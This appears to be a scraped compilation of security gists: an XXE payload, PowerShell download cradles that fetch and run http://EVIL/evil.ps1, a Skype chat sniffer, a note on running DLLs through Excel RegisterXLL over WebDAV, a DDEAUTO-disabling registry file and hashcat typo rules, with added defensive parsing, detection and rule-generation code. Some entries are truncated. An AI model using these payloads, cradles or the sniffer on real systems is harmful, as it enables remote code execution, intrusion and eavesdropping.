staaldraad / XXE_payloads
Last active June 15, 2024 16:32
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
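Added example (Python, not part of staaldraad's gist): it runs the vanilla payload above through Python's expat parser twice. The first pass records the external entity the parser would try to fetch when `&sp;` is expanded, which is the outbound request the payload is meant to trigger (nothing is fetched here). The second pass is the hardened form that refuses any document carrying a DOCTYPE. The host `attacker.example` stands in for `x.x.x.x` and is a constructed placeholder.

```python
import xml.parsers.expat as expat

# Constructed sample: the vanilla payload above, with x.x.x.x replaced by a
# placeholder host. The URL is hypothetical and is never contacted.
XXE_PAYLOAD = b"""<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://attacker.example:443/test.txt">
]>
<r>&sp;</r>"""

# Constructed benign document for comparison.
BENIGN = b'<?xml version="1.0" ?><r>hello</r>'


class DTDRejected(Exception):
    """Raised by the hardened parser when a document carries a DOCTYPE."""


def external_fetches(data: bytes) -> list:
    """Parse `data` and return the system identifiers (URLs or paths) of
    every external entity the parser would fetch while expanding content.

    expat calls ExternalEntityRefHandler when an external general entity
    such as &sp; is referenced; we record the target instead of loading it,
    which is exactly the outbound request a blind/out-of-band XXE probe
    relies on.
    """
    fetched = []
    parser = expat.ParserCreate()

    def on_external_ref(context, base, system_id, public_id):
        fetched.append(system_id)
        return 1  # non-zero tells expat the reference was handled; no fetch

    parser.ExternalEntityRefHandler = on_external_ref
    parser.Parse(data, True)
    return fetched


def parse_hardened(data: bytes) -> str:
    """Parse `data` but refuse any document that declares a DTD, which
    removes both entity expansion and external fetches. Returns the root
    element name on success and raises DTDRejected otherwise."""
    root = []
    parser = expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        raise DTDRejected("DOCTYPE %r is not allowed" % name)

    def on_start_element(name, attrs):
        if not root:
            root.append(name)

    parser.StartDoctypeDeclHandler = on_doctype
    parser.StartElementHandler = on_start_element
    parser.Parse(data, True)
    return root[0]


def hardened_accepts(data: bytes) -> bool:
    """True if the hardened parser accepts the document, False if it was
    rejected for carrying a DTD."""
    try:
        parse_hardened(data)
        return True
    except DTDRejected:
        return False


if __name__ == "__main__":
    print("would fetch:", external_fetches(XXE_PAYLOAD))
    print("hardened accepts payload:", hardened_accepts(XXE_PAYLOAD))
    print("hardened accepts benign:", hardened_accepts(BENIGN))
```

The same two-step check works on any XML input path: if a listener on the recorded URL receives a hit in production, the parser in front of it resolves external entities and needs the DOCTYPE rejection (or the equivalent `resolve_entities`/`DtdProcessing` setting of whatever library is in use).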
HarmJ0y / DownloadCradles.ps1
Last active July 18, 2024 03:59
Download Cradles
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object
PaulSec / skype_sniffer.py
Created October 29, 2015 11:48
Simple Skype Sniffer
import time

import Skype4Py


def Commands(message, status):
    # Print the body of every chat message as it is sent or received.
    if status == 'SENT' or status == 'RECEIVED':
        print(message.Body)


skype = Skype4Py.Skype()
skype.OnMessageStatus = Commands
skype.Attach()

# Keep the process alive so the event handler keeps firing.
while True:
    time.sleep(1)
ryhanson / ExcelXLL.md
Last active July 22, 2024 15:25
Execute a DLL via .xll files and the Excel.Application object's RegisterXLL() method

DLL Execution via Excel.Application RegisterXLL() method

A DLL can be loaded and executed via Excel by initializing the Excel.Application COM object and passing a DLL to the RegisterXLL method. The DLL path does not need to be local; it can also be a UNC path that points to a remote WebDAV server.

When delivering via WebDAV, it should be noted that the DLL is still written to disk, but the dropped file is not the one loaded into the process. This is the case for any file downloaded via WebDAV, and they are stored at: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\.

The RegisterXLL function expects an XLL add-in, which is essentially a specially crafted DLL with specific exports. More info on XLLs can be found on MSDN.

The XLL can also be executed by double-clicking the .xll file, however there is a security warning. @rxwx has more notes on this here inc
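Added example (Python; not from HarmJ0y's or ryhanson's gists): a small triage routine that runs the indicators from the download cradles above and the RegisterXLL note over constructed PowerShell script-block texts (the kind Event ID 4104 records) and over file paths, flagging the WebDAV drop directory named above. Hostnames, URLs, the sample events and the indicator names are all constructed. Excel.Application also appears in legitimate automation, so treat an XLL hit as a hunting lead rather than a verdict.

```python
import re

# Indicator patterns distilled from the cradle one-liners and the RegisterXLL
# write-up. Names are our own; matching is case-insensitive like PowerShell.
INDICATORS = {
    # ways of pulling a payload: WebClient, iwr/Invoke-WebRequest, IE COM, MSXML
    "download_cradle": re.compile(
        r"\.downloadstring\(|\.downloadfile\(|\biwr\b|invoke-webrequest|"
        r"Msxml2\.XMLHTTP|InternetExplorer\.Application", re.I),
    # running what was pulled without touching disk
    "in_memory_exec": re.compile(r"\biex\b|invoke-expression", re.I),
    # Excel COM object plus the add-in loader
    "xll_register": re.compile(r"Excel\.Application|RegisterXLL", re.I),
    # a \\host\share style path, as used to point RegisterXLL at WebDAV
    "unc_path": re.compile(r"\\\\[\w.-]+\\"),
}

# Where the WebDAV mini-redirector drops fetched files (from the note above).
WEBDAV_DROP_DIR = re.compile(r"\\TfsStore\\Tfs_DAV\\", re.I)

# Constructed sample script-block texts: (host, script text).
SAMPLE_EVENTS = [
    ("host1", 'IEX (New-Object Net.Webclient).downloadstring("http://evil.example/evil.ps1")'),
    ("host1", "IEX (iwr 'http://evil.example/evil.ps1')"),
    ("host2", "$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;"
              "$ie.navigate('http://evil.example/evil.ps1');$r=$ie.Document.body.innerHTML;IEX $r"),
    ("host3", "$x=New-Object -ComObject Excel.Application;"
              "$x.RegisterXLL('\\\\dav.example\\share\\addin.xll')"),
    ("host3", "Get-Process | Where-Object { $_.CPU -gt 100 }"),
    # a download with no in-memory execution: saved to disk, not a cradle
    ("host4", "Invoke-WebRequest -Uri https://intranet.example/report.csv -OutFile C:\\temp\\report.csv"),
]


def classify(script_text: str) -> list:
    """Return the sorted indicator names that fire on one script block."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(script_text))


def is_suspicious(script_text: str) -> bool:
    """A cradle needs both a fetch and an in-memory execution primitive;
    any RegisterXLL/Excel COM use is worth a look on its own."""
    tags = set(classify(script_text))
    cradle = {"download_cradle", "in_memory_exec"} <= tags
    return cradle or "xll_register" in tags


def find_suspicious(events) -> list:
    """Run the triage over (host, script) pairs; return (host, tags) hits."""
    return [(host, classify(text)) for host, text in events if is_suspicious(text)]


def is_webdav_drop(path: str) -> bool:
    """True if a file-create path is inside the WebDAV cache directory, i.e.
    the on-disk copy left behind by a UNC/WebDAV delivery."""
    return WEBDAV_DROP_DIR.search(path) is not None


if __name__ == "__main__":
    for host, tags in find_suspicious(SAMPLE_EVENTS):
        print(host, tags)
    # constructed path
    print(is_webdav_drop(r"C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\addin.xll"))
```

The `host4` event shows why the cradle rule needs both halves: a download that lands on disk is ordinary administration, while the same download fed straight to `IEX` is the pattern the cradles above rely on.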

wdormann / disable_ddeauto.reg
Last active May 8, 2024 07:50
Disable DDEAUTO for Outlook, Word, OneNote, and Excel versions 2010, 2013, 2016
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options]
"DontUpdateLinks"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Word\Options]
"DontUpdateLinks"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Options]
"DontUpdateLinks"=dword:00000001
roycewilliams / hashcat-kwprocessor-typo-rules.txt
Last active October 25, 2023 19:27
hashcat-kwprocessor-typo-rules.txt
--------------------------------------------------------------------------------
# Crude generation of typo rules
# (Using kwprocessor (https://github.com/hashcat/kwprocessor) and hashcat)
#
# Useful for passwords that don't require confirmation (like some cryptocurrency
# wallets, password-protected archive files, etc.)
#
# May also be useful for stacking with other rules.
#
# This approach assumes that you are making the same typo every time
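Added example (Python; not roycewilliams' kwprocessor method, which the gist builds on, but a stand-alone illustration of the same idea): it generates hashcat `sXY` rules for keys that sit next to each other on a QWERTY layout and shows what they do to a sample password. The same-typo-every-time assumption stated in the gist is exactly what the `s` function (replace every X with Y) encodes, so a consistent `s`-for-`d` slip becomes `paddword`, while a single-position slip like `pasdword` is not produced. The layout table and the vertical-neighbour simplification are this example's own assumptions.

```python
# Three QWERTY letter rows; a key's neighbours on its own row and the key in
# the same column one row up or down are where a finger usually slips.
# (The half-key row offset of a real keyboard is ignored here: an assumption.)
ROWS = ["qwertyuiop", "asdfghjkl", "zxcvbnm"]


def neighbours(ch: str) -> list:
    """Keys physically adjacent to `ch` on the layout above."""
    out = []
    for r, row in enumerate(ROWS):
        if ch not in row:
            continue
        i = row.index(ch)
        if i > 0:
            out.append(row[i - 1])
        if i + 1 < len(row):
            out.append(row[i + 1])
        for rr in (r - 1, r + 1):
            if 0 <= rr < len(ROWS) and i < len(ROWS[rr]):
                out.append(ROWS[rr][i])
    return out


def typo_rules() -> list:
    """One hashcat rule per (key, neighbour) pair. `sXY` replaces every X
    with Y, which models a user who mistypes the same character the same
    way each time (the assumption the gist states)."""
    rules = []
    for row in ROWS:
        for ch in row:
            for nb in neighbours(ch):
                rules.append("s%s%s" % (ch, nb))
    return rules


def apply_rule(rule: str, word: str) -> str:
    """Apply the subset of hashcat rule syntax used here: `:` (no-op) and
    `sXY` (replace all X with Y)."""
    if rule == ":":
        return word
    if len(rule) == 3 and rule[0] == "s":
        return word.replace(rule[1], rule[2])
    raise ValueError("unsupported rule: %r" % rule)


def typo_candidates(word: str) -> list:
    """Every distinct variant the rules would make hashcat try for `word`,
    excluding the unchanged word itself (rules that do not apply)."""
    seen = set()
    for rule in typo_rules():
        cand = apply_rule(rule, word)
        if cand != word:
            seen.add(cand)
    return sorted(seen)


if __name__ == "__main__":
    # Write the rules to stdout so they can be redirected into a .rule file
    # and passed to hashcat with -r.
    print("\n".join(typo_rules()))
```

Stacking these with another rule file (`-r typo.rule -r other.rule`) applies the typo after the other transformation, which is the "stacking" use the gist mentions.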